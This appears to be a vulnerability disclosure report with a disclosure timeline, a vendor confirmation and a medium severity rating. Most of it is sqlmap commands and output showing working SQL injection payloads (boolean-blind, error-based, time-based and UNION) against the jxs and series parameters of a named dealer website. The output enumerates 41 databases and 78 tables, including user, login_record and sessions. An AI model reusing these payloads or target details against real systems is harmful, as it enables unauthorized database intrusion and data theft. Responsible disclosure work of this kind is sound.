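2015-11-20: Details reported to the vendor; awaiting vendor response
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public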
sqlmap.py -u "http://hljjmsyt.zznissan.com.cn/map.php?jxs='"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: jxs (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: jxs=-5068' OR 6417=6417#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: jxs=-6361' OR 1 GROUP BY CONCAT(0x716b706271,(SELECT (CASE WHEN (4978=4978) THEN 1 ELSE 0 END)),0x717a717071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: UNION query
    Title: MySQL UNION query (random number) - 17 columns
    Payload: jxs=-3887' UNION ALL SELECT 9874,9874,9874,9874,9874,CONCAT(0x716b706271,0x716f6d43435956614755,0x717a717071),9874,9874,9874,9874,9874,9874,9874,9874,9874,9874,9874#
---
web application technology: Apache
back-end DBMS: MySQL 5
current database: 'zznissan'

current user: 'zznissan@localhost'

available databases [41]:
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak

sqlmap identified the following injection point(s) with a total of 1800 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://hljjmsyt.zznissan.com.cn:80/ajax_series.php?series=-1607 OR 1 GROUP BY CONCAT(0x716b6b6a71,(SELECT (CASE WHEN (6251=6251) THEN 1 ELSE 0 END)),0x716a6b6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://hljjmsyt.zznissan.com.cn:80/ajax_series.php?series=(SELECT (CASE WHEN (7809=7809) THEN SLEEP(5) ELSE 7809*(SELECT 7809 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: UNION query
    Title: MySQL UNION query (random number) - 4 columns
    Payload: http://hljjmsyt.zznissan.com.cn:80/ajax_series.php?series=-1336 UNION ALL SELECT 8846,8846,CONCAT(0x716b6b6a71,0x4c446b767a6a6149744c,0x716a6b6a71),8846#
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12

Database: zznissan
[78 tables]
+-------------------+
| Recruitment       |
| user              |
| act_article       |
| act_category      |
| article           |
| article1029       |
| brandpicture      |
| car_adimg         |
| car_brand         |
| car_carimg        |
| car_config        |
| car_detail        |
| car_drive         |
| car_drivehouse    |
| car_getinfo       |
| car_leixing       |
| car_models        |
| car_modelsinfo    |
| car_norms         |
| car_parameter     |
| car_seat          |
| car_series        |
| car_seriesinfo    |
| car_spec          |
| car_speed         |
| car_standard      |
| car_structure     |
| car_user          |
| car_userfun       |
| car_usergroup     |
| car_view          |
| category          |
| department        |
| displacement      |
| downcategory      |
| download          |
| dqcategory        |
| ecatalog          |
| energy_config     |
| energy_detail     |
| energy_images     |
| energy_memory     |
| energy_notice     |
| energy_parameter  |
| energy_picture    |
| energy_series     |
| energy_seriesinfo |
| energy_video      |
| energy_view       |
| feedback          |
| get_active        |
| imagefile         |
| imgcategory       |
| jxs_getinfo       |
| login_record      |
| memory            |
| mobilepicture     |
| mx6_dealer        |
| mx6_testdrive     |
| mx6_user          |
| picture           |
| price             |
| purecategory      |
| puregoods         |
| rencai            |
| service           |
| service_bak       |
| sessions          |
| survey            |
| telents           |
| topic             |
| userfun           |
| usergroup         |
| view_Carprice     |
| view_models       |
| view_models_test  |
| view_parameter    |
| zhaopin           |
+-------------------+
Filter the relevant parameters.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-11-20 11:17
Vulnerability received, thank you.
None yet.